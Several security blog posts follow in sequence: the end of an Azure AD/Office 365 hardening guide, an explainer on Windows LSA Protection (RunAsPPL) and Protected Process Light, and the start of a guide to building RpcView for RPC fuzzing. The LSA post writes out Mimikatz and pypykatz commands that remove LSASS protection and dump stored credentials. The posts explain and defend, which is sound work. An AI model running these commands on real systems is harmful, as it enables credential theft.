$appId = "1b730954-1685-4b74-9bfd-dac224a7b894" #azuread

$sp = Get-AzureADServicePrincipal -Filter "appId eq '$appId'"

if (-not $sp) { $sp = New-AzureADServicePrincipal -AppId $appId}

$user = Get-AzureADUser -objectId <upn> #permit only to this user(s) to access Azure Ad PS

New-AzureADServiceAppRoleAssignment -ObjectId $sp.ObjectId -ResourceId $sp.ObjectId -Id ([Guid]::Empty.ToString()) -PrincipalId $user.ObjectId

If user is not explicitly permitted, he cannot access:

Following the same procedure, you can also restrict access to MS Graph module (appid: 14d82eec-204b-4c2f-b7e8-296a70dab67e)

Disable Legacy Authentication

Disabling Legacy Authentication in a must-do if you are thinking about how to reduce your attack surface.

Legacy Authentication refers to all protocols that use the unsecure Basic Authentication mechanism and if you don’t block legacy authentication your MFA strategy won’t be effective as expected.

Among legacy authentication protocols are:

  • Exchange ActiveSync (EAS)
  • Exchange Web Services (EWS)
  • IMAP4
  • MAPI over HTTP (MAPI/HTTP)
  • RPC over HTTP
  • POP3
  • Authenticated SMTP
  • ….

Modern authentication is based on the Active Directory Authentication Library (ADAL) and OAuth 2.0 which support multi-factor authentication and interactive sign-in.

But blocking legacy authentication in your directory is easier to say than done .. you need to evaluate and understand the potential impacts before!

Starting from analyzing Azure AD sign-ins logs could be a good starting point.

  • Navigate to the Azure portal > Azure Active Directory > Sign-ins.
  • Add the Client App column if it is not shown by clicking on Columns > Client App.
  • Add filters > Client App > select all of the legacy authentication protocols. Select outside the filtering dialog box to apply your selections and close the dialog box

Unfortunately there is no magic “recipe”, you should avoid using applications which don’t support modern authentication 😦

For example, if you are still using the unsupported Outlook/Office 2010, it’s really time to upgrade to a newer version.

Blocking legacy authentication using Azure AD Conditional Access

The best way to block legacy authentication to Azure AD is through Conditional Access. Keep in mind it requires at least Azure Active Directory P1 licenses.

You can directly and indirectly block legacy authentication with CA policies and include/exclude specific users and groups as shown here

Consider to enable your blocking policy in Report-only mode to monitor impacts before changing the state of the policy from “Report-Only” to “On”.

Blocking legacy authentication service-side

If you don’t have Azure AD P1 or P2 licenses, the good news is that nothing is lost! Legacy authentication can be blocked service-side or resource-side.

Exchange Online

The easiest way is just to disable the protocols which by default use legacy authentication like Pop3, Imap, …

This can be done via exchange management powershell:

Get-CASMailbox -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | Set-CASMailbox -ImapEnabled $false -PopEnabled $false

With this commands you will disable Imap and Pop3 for all mailbox users. Once done, you can enable only a specific subset of users who really need to use these protocols.

You can also set a global policy which will disable these protocols for all new mailboxes:

Get-CASMailboxPlan -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | set-CASMailboxPlan -ImapEnabled $false -PopEnabled $false

The problem with this setting could be if you don’t want to block protocols that can do legacy and modern authentication. Exchange Online has a feature named authentication policies that you can use to block legacy authentication per protocol.

To manage authentication policy in Microsoft 365 Admin Center:

  • Navigate to the Microsoft 365 admin center
  • Settings > Org Setting
  • Navigate to Modern Authentication

You can even more fine grain these settings by allowing / disallowing basic authentication protocols for specific users using the authentication policies cmdlets:

New-AuthenticationPolicy -Name "Allow Basic Authentication for POP3"
Set-AuthenticationPolicy -Identity "Allow Basic Authentication for POP3" -AllowBasicAuthPop
Set-user -Identity [email protected] AuthenticationPolicy "Allow Basic Authentication for Pop3"

Sharepoint Online

In order to disable legacy authentication on your Sharepoint Online tenant you can use the follwoing cmdlets:

Connect-SPOService -Url –https://-admin.sharepoint.com
Get-SPOTenant
Set-SPOTenant –LegacyAuthProtocolsEnabled $false

AppLICATIONS, Consent and Permissions.. oh my..

The variegated world of the so-called “Applications” essentially have to interact with the ecosystem of O365 services exposed through public API and it’s up to you to manage and grant the appropriate permissions requested by the Apps. It’s a complex topic and in this chapter we will give you some simple advices. If security is your concern (I bet yes), the first thing to do is is to prohibit users consent for “unknown” apps, given that it’s allowed by default (??).

Why should you do it? Because by setting a more restrictive consent (as highlighted in the screenshot) will prevent most of the well known phishing techniques by abusing “malicious apps” and Oauth2. You can find an excellent example by @merlos here.

If the user clicks on the malicious link in the phishing email, he will no more have the possibility to accept the requested permissions:

But will be presented this screen where the Organization’s Admin approval is required:

You should also disable “Users can register applications” feature 

Only users with administrative roles or a limited subset of users with “Application developer” role  should be allowed to register custom-developed applications after these are reviewed and evaluated also from a security perspective.

Conclusion

In this short we hope to have given you some useful tips on how to somehow secure your tenants. The topic is clearly much more complex and requires dedicated skills, but as usual you have to start from the basics 😉

In next post we will (hopefully) write about logging, auditing, detecting .. stay tuned!

.. and adopt Two Factor Authentication (2FA) for all your users!!

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected.

Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary.

But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it.

Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather gather the information which I think is the most valuable from a security consultant’s perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before.

If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:

  1. open the Registry Editor (regedit.exe) as an Administrator;
  2. open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
  3. add the DWORD value RunAsPPL and set it to 1;
  4. reboot.

That’s it! You are done!

Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions.

  • Do you use any third-party authentication module?
  • Do you use UEFI and/or Secure Boot?

Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that they meet the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such module would be blocked if RunAsPPL were enabled.

Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection.

You Shall Not Pass!

By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar.

This screenshot shows several important things:

  • the current user is a member of the default Administrators group;
  • the current user has SeDebugPrivilege (although it is currently disabled);
  • the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege;
  • the command sekurlsa::logonpasswords failed with the error code 0x00000005.

So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in.

HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);

if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499).

Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then, it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means “Access is denied”. This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags.

All the things I have explained so far can be considered common knowledge as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts.

Bypassing RunAsPPL with Currently Known Techniques

At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short.

Technique 1 – The Revenge of the Kiwi

In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it.

To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Once you are done, you can even “restore” the protection using the same command, but without the /remove argument and finally unload the driver with !-.

mimikatz # !processprotect /process:lsass.exe
mimikatz # !-

There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was as you will see in the next part but it could also have some undesired side effects.

Technique 2 – Bring You Own Driver

The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in-memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do.

If you don’t want to go through the official signing process, there is a clever trick you can use. This trick consists in loading an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded it can be exploited from User-land to load an unsigned driver for example. This technique is implemented in gdrv-loader and PPLKiller for instance.

Technique 3 – Python & Katz

The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such technique is still very dangerous, make one mistake and you trigger a BSOD.

More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking access to LSASS process.

If you want to access LSASS’ memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: simply do not invoke OpenProcess. But how do you get the initial handle then? The answer came from the following observation. Sometimes, other processes, such as in the case of Antivirus software, already have an opened handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you could copy this handle into you own process and then use it to access LSASS.

It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL because some unprotected processes may have obtained a handle on the LSASS process by another mean, using a driver for instance. In which case you can use pypykatz with the following command.

pypykatz live lsa --method handledup

On some occasions, this method worked perfectly fine for me but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine.

What are PPL Processes?

Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first so I can explain them into more detail here.

A Long Time Ago in a Galaxy Far, Far Away…

OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning.

First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008 and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the “Protected Processes” part of Windows Internals).

In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly-sensitive processes.

A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. PPL is actually an extension of the previous Protected Process model and adds the concept of “Protection level”, which basically means that some PP(L) processes can be more protected than others.

Protection Levels

The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;                  // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

As you probably guessed, a process’ protection level is defined by a combination of these two values. The below table lists the most common combinations.

Protection level Value Signer Type
PS_PROTECTED_SYSTEM 0x72 WinSystem (7) Protected (2)
PS_PROTECTED_WINTCB 0x62 WinTcb (6) Protected (2)
PS_PROTECTED_WINDOWS 0x52 Windows (5) Protected (2)
PS_PROTECTED_AUTHENTICODE 0x12 Authenticode (1) Protected (2)
PS_PROTECTED_WINTCB_LIGHT 0x61 WinTcb (6) Protected Light (1)
PS_PROTECTED_WINDOWS_LIGHT 0x51 Windows (5) Protected Light (1)
PS_PROTECTED_LSA_LIGHT 0x41 Lsa (4) Protected Light (1)
PS_PROTECTED_ANTIMALWARE_LIGHT 0x31 Antimalware (3) Protected Light (1)
PS_PROTECTED_AUTHENTICODE_LIGHT 0x11 Authenticode (1) Protected Light (1)

Signer Types

In the early days of Protected Processes, the protection level was binary, either a process was protected or it was not. We saw that this changed when PPL were introduced with Windows NT 6.3. Both PP and PPL now have a protection level which is determined by a signer level as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined.

The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file’s digital certificate: Enhanced Key Usage (EKU).

On this screenshot, you can see two examples, wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level.

Protection Precedence

The last key aspect that needs to be discussed is the Protection Precedence. In the “Protected Process Light (PPL) part of Windows Internals 7th Edition Part 1, you can read the following:

When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa.

In other words:

  • a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal;
  • a PPL can open another PPL with full access, as long as its signer level is greater or equal;
  • a PPL cannot open a PP with full access, regardless of its signer level.

Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low privileged user, you will not be able to magically access other users’ processes. It’s an additional protection.

To illustrate this, I picked 3 easily identifiable processes / image files:

  • wininit.exe – Session 0 initilization
  • lsass.exe – LSASS process
  • MsMpEng.exe – Windows Defender service

Pr. Process Type Signer Level
1 wininit.exe Protected Light WinTcb PsProtectedSignerWinTcb-Light
2 lsass.exe Protected Light Lsa PsProtectedSignerLsa-Light
3 MsMpEng.exe Protected Light Antimalware PsProtectedSignerAntimalware-Light

These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege so user rights are not a concern in this example. This all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe can access none of the two other processes because it has the lowest level.

Conclusion

In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw.

In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”), would still be able to open it with full access.

There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks.

Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned!

Update 2021-04-25 – The second part is now available here: Bypassing LSA Protection in Userland

Links & Resources

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in a an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modyfing the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once, Visual Studio is installed. You have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is how do you find and download Qt5 5.15.2? That’s were things get a bit tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you let all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to dowload all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of this file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
}

We can see that each version number is represented as a longlong value. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041 = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
}

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bits compilation process, but if you want to compile the 32-bits version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).
mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

